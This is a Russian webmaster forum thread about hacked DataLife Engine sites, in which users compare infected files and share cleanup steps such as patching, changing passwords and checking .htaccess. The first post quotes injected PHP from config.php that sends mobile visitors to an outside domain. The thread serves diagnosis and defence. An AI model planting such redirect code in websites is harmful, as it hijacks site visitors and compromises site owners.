Взлом dle проверяем файлы.
Страницы: 1 2 3 4 5 ... 7 След.
Взлом dle проверяем файлы., Вирус редирект в dle
Недавно ковырялся в бекапе сайта, случайно как-то увидел изменения config.php, и обнаружил там такой вот кодик:

Код
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) { 
    header('Location: http://statuses.ws/');
}
Сейчас буду чистить весь сайт, проверять на вирусню: пока что такую фигня обраружил в  /engine/data/config.php, /engine/init.php, index.php .Короче смотрите те файлы которые недавно были изменены, у меня вирус появился как смотрю по дате 9 января.

Или переустановить двиг?!smile:confused:
Цитата
Леон пишет:
Или переустановить двиг?!smile:confused:
Меняйте, потом отпишитесь, получилось или нет;)
А на крайний случай - нужно иметь свежие бэкапы).
Качественный рерайт/копирайт/перевод | Создание сайтов за еду! Дёшево!
Пока просто почистил, посмотрим что будет дальше. Двиг пока не охота переустанавливать слишком много модулей установлено.
Такая фигня не тока у меня:http://forum.searchengines.ru/showthread.php?s=cbc38d89875a6622c732af2d15892948&p=11292076
вот блин тоже нашел эту дрянь на 3 сайтах, кто знает откуда корни растут?
У меня тоже ((smile:mad:
Я пофиксил! сначало снес весь код левый и с офы пач поставил!
init.php
index.php
dbconfig.php
config.php 

В этих файлах сносите левый код!
Сейчас найду ссылочку фикса и скину!
dle-news.ru/bags/v97/1547-patchi-bezopasnosti-dlya-versiy-97-i-nizhe.html]Вот скачайте перезалейте файл!

Вроде проверили этот файл... дописали много чего!
Дополнительно поменяйте все пароли от баз данных и тд!  проверьте даты изменения файлов примерно тогда когда у вас изменились эти файлы и также сносите код!smile:p  Удачи вам! если поможет отпишитесь!
Думая что большинство из зараженных двигов - nulled, отсюда и проблема, но могу ошибаться... Рекомендую еще заглянуть в корневой .htaccess, там тоже бывает много чего интересного!
Такая же фигня.... smile:mad: руки оторвать...
Может кому будет полезно! Заметила что среди сайтов на DLE на одном же сервере есть зараженные и нет. Нашла чем они у меня отличаются (версии Dle разные) не заражены были сайты где файл admin.php, были переименованы.
index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php
Кучка жалких школьников плакает, вай какая беда:)
Изменено: цтуе wnet - 15 Января 2013 08:12
Цитата
цтуе wnet пишет:
Кучка жалких школьников плакает, вай какая беда:)
*смотрит как на идиота*smile:confused:
Страницы: 1 2 3 4 5 ... 7 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
16:07 Работаем в P2P платежах BYBIT | USDT - RUB , RUB - USDT | Ищем постоянных клиентов , выгодные условия. 
10:44 AntiBot Cloud - бесплатный скрипт и сервис защиты сайтов 
20:13 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
19:41 25$ (ежемесячно) AdSense 
21:39 Подскажите где продвигать сайт. 
10:57 3snet - гемблинг, беттинг, форекс, бинарные опционы, майнинг 
19:12 Мошенники-копирайтеры 
05:11 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
23:23 STREAM X CASH — Ваш амбициозный и надежный партнер в сфере криптообмена 
20:37 BestX24 - быстрый и безопасный обменник криптовалют и электронных денежных средств 
18:57 Обменник криптовалют Saint-Exchange 
16:21 AllCharge.online. Современный, быстрый и надёжный обменник 
14:02 SiteAnalyzer SEO Tools - бесплатное браузерное расширение для Chrome & Firefox 
12:25 Продам Домены .COM с историей трафика. 
03:11 Точные прогнозы на футбол 
23:47 Добро пожаловать в цифровой мир... 
22:39 Топ-5 способов использовать мобильные прокси для бизнеса: подробный обзор 
11:58 Куплю проигрышные букмекерские аккаунты 
00:12 Огородники 
10:59 Новости искусственного интеллекта 
04:26 Хром ругается на форум